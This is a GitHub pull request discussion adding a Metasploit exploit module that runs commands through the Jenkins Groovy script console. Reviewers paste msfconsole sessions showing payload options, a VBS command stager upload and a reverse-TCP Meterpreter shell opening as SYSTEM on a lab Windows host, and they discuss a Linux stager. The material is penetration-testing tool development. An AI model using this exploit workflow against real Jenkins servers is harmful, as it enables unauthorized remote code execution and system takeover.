-
Notifications
You must be signed in to change notification settings - Fork 13.8k
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
add module to execute commands via Jenkins Script Console #1338
add module to execute commands via Jenkins Script Console #1338
Conversation
'jamcut' | ||
], | ||
'License' => MSF_LICENSE, | ||
'Version' => '$Revision: $', |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
The Version field isn't needed anymore (svn related)
The exploit doesn't work for me when using an empty username and password. I think the exploit should allow it, because the windows package, by default hasn't enabled security, so no username and password by default to access the script console: msf exploit(jenkins_script_console) > show options Module options (exploit/multi/http/jenkins_script_console): Name Current Setting Required Description ---- --------------- -------- ----------- PASSWORD no The password for the specified username PATH / yes The path to jenkins Proxies no Use a proxy chain RHOST 192.168.1.147 yes The target address RPORT 8080 yes The target port USERNAME no The username to authenticate as VHOST no HTTP server virtual host Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique: seh, thread, process, none LHOST 192.168.1.128 yes The listen address LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Windows msf exploit(jenkins_script_console) > rexploit [*] Reloading module... [*] Started reverse handler on 192.168.1.128:4444 [*] Checking access to the script console [-] Exploit failed: NoMethodError undefined method `split' for nil:NilClass |
|
||
when 'unix' | ||
print_status("#{rhost}:#{rport} - Sending payload...") | ||
http_send_command("#{payload.encoded}") |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
In the "struts_code_exec.rb" there is a nice linux stager wrote by bannedit I guess, not sure if you tried if it could work in this case.
The issue was the JSESSIONID= was not matching the cookie when installing Jenkins from the original site (as opposed to bitnami), which included additional information like JSESSIONID.24e25ab7. The module will still detect, and handle if logging in is required and seems to be working as would be expected in either case. Thanks for the help testing jvazquez. |
Tested working better now in windows: msf > use exploit/multi/http/jenkins_script_console msf exploit(jenkins_script_console) > set rhost 192.168.1.147 rhost => 192.168.1.147 msf exploit(jenkins_script_console) > set rport 8080 rport => 8080 msf exploit(jenkins_script_console) > show options Module options (exploit/multi/http/jenkins_script_console): Name Current Setting Required Description ---- --------------- -------- ----------- PASSWORD no The password for the specified username Proxies no Use a proxy chain RHOST 192.168.1.147 yes The target address RPORT 8080 yes The target port TARGETURI /jenkins/ yes The path to jenkins USERNAME no The username to authenticate as VHOST no HTTP server virtual host Exploit target: Id Name -- ---- 0 Windows msf exploit(jenkins_script_console) > set TARGETURI / TARGETURI => / msf exploit(jenkins_script_console) > rexploit [*] Reloading module... [*] Started reverse handler on 192.168.1.128:4444 [*] Checking access to the script console [*] No authentication required, skipping login... [*] 192.168.1.147:8080 - Sending VBS stager... [*] Command Stager progress - 2.01% done (2048/101881 bytes) [*] Command Stager progress - 4.02% done (4096/101881 bytes) [*] Command Stager progress - 6.03% done (6144/101881 bytes) [*] Command Stager progress - 8.04% done (8192/101881 bytes) [*] Command Stager progress - 10.05% done (10240/101881 bytes) [*] Command Stager progress - 12.06% done (12288/101881 bytes) [*] Command Stager progress - 14.07% done (14336/101881 bytes) [*] Command Stager progress - 16.08% done (16384/101881 bytes) [*] Command Stager progress - 18.09% done (18432/101881 bytes) [*] Command Stager progress - 20.10% done (20480/101881 bytes) [*] Command Stager progress - 22.11% done (22528/101881 bytes) [*] Command Stager progress - 24.12% done (24576/101881 bytes) [*] Command Stager progress - 26.13% done (26624/101881 bytes) [*] Command Stager progress - 28.14% done (28672/101881 bytes) [*] Command Stager progress - 30.15% done (30720/101881 bytes) [*] Command Stager progress - 32.16% done (32768/101881 bytes) [*] Command Stager progress - 34.17% done (34816/101881 bytes) [*] Command Stager progress - 36.18% done (36864/101881 bytes) [*] Command Stager progress - 38.19% done (38912/101881 bytes) [*] Command Stager progress - 40.20% done (40960/101881 bytes) [*] Command Stager progress - 42.21% done (43008/101881 bytes) [*] Command Stager progress - 44.22% done (45056/101881 bytes) [*] Command Stager progress - 46.23% done (47104/101881 bytes) [*] Command Stager progress - 48.24% done (49152/101881 bytes) [*] Command Stager progress - 50.25% done (51200/101881 bytes) [*] Command Stager progress - 52.26% done (53248/101881 bytes) [*] Command Stager progress - 54.28% done (55296/101881 bytes) [*] Command Stager progress - 56.29% done (57344/101881 bytes) [*] Command Stager progress - 58.30% done (59392/101881 bytes) [*] Command Stager progress - 60.31% done (61440/101881 bytes) [*] Command Stager progress - 62.32% done (63488/101881 bytes) [*] Command Stager progress - 64.33% done (65536/101881 bytes) [*] Command Stager progress - 66.34% done (67584/101881 bytes) [*] Command Stager progress - 68.35% done (69632/101881 bytes) [*] Command Stager progress - 70.36% done (71680/101881 bytes) [*] Command Stager progress - 72.37% done (73728/101881 bytes) [*] Command Stager progress - 74.38% done (75776/101881 bytes) [*] Command Stager progress - 76.39% done (77824/101881 bytes) [*] Command Stager progress - 78.40% done (79872/101881 bytes) [*] Command Stager progress - 80.41% done (81920/101881 bytes) [*] Command Stager progress - 82.42% done (83968/101881 bytes) [*] Command Stager progress - 84.43% done (86016/101881 bytes) [*] Command Stager progress - 86.44% done (88064/101881 bytes) [*] Command Stager progress - 88.45% done (90112/101881 bytes) [*] Command Stager progress - 90.46% done (92160/101881 bytes) [*] Command Stager progress - 92.47% done (94208/101881 bytes) [*] Command Stager progress - 94.48% done (96256/101881 bytes) [*] Command Stager progress - 96.49% done (98304/101881 bytes) [*] Command Stager progress - 98.50% done (100348/101881 bytes) [*] Command Stager progress - 100.00% done (101881/101881 bytes) [*] Sending stage (752128 bytes) to 192.168.1.147 [*] Meterpreter session 1 opened (192.168.1.128:4444 -> 192.168.1.147:1938) at 2013-01-20 02:39:09 +0100 meterpreter > getuid sServer username: NT AUTHORITY\SYSTEM meterpreter > sysinfo Computer : JUAN-C0DE875735 OS : Windows XP (Build 2600, Service Pack 3). Architecture : x86 System Language : en_US Meterpreter : x86/win32 meterpreter > exit [*] Shutting down Meterpreter... [*] 192.168.1.147 - Meterpreter session 1 closed. Reason: User exit msf exploit(jenkins_script_console) > Since there isn't response about the linux stager comment I'll do a little testing tomorrow around it :) Hopefully we'll be able to close it soon ! :D Thanks @zeroSteiner !! |
Hi @zeroSteiner, I've added a new target for linux staging so native meterpreter can be executed. The Unix CMD target remains because it's always useful. CMD payloads are fine and the staging can fail in some targets! If you agree with the code, please land this pull request into your branch ( zeroSteiner#1 ), and this pull request will be automatically updated!
|
Added target for linux stager
I like it. Before spoke to #metasploit on IRC I was hoping to add this in with the features of #1275 but since mixins can't be used based on the platform this will work. |
Awesome! :) merging! |
This pull requests introduces a module to execute OS commands via the Groovy script console of Jenkins continuous integration server. It's been tested on Windows as well as Ubuntu on versions 1.496 and 1.499 (latest).
Jenkins can be found here: http://jenkins-ci.org/
Ubuntu output
Windows output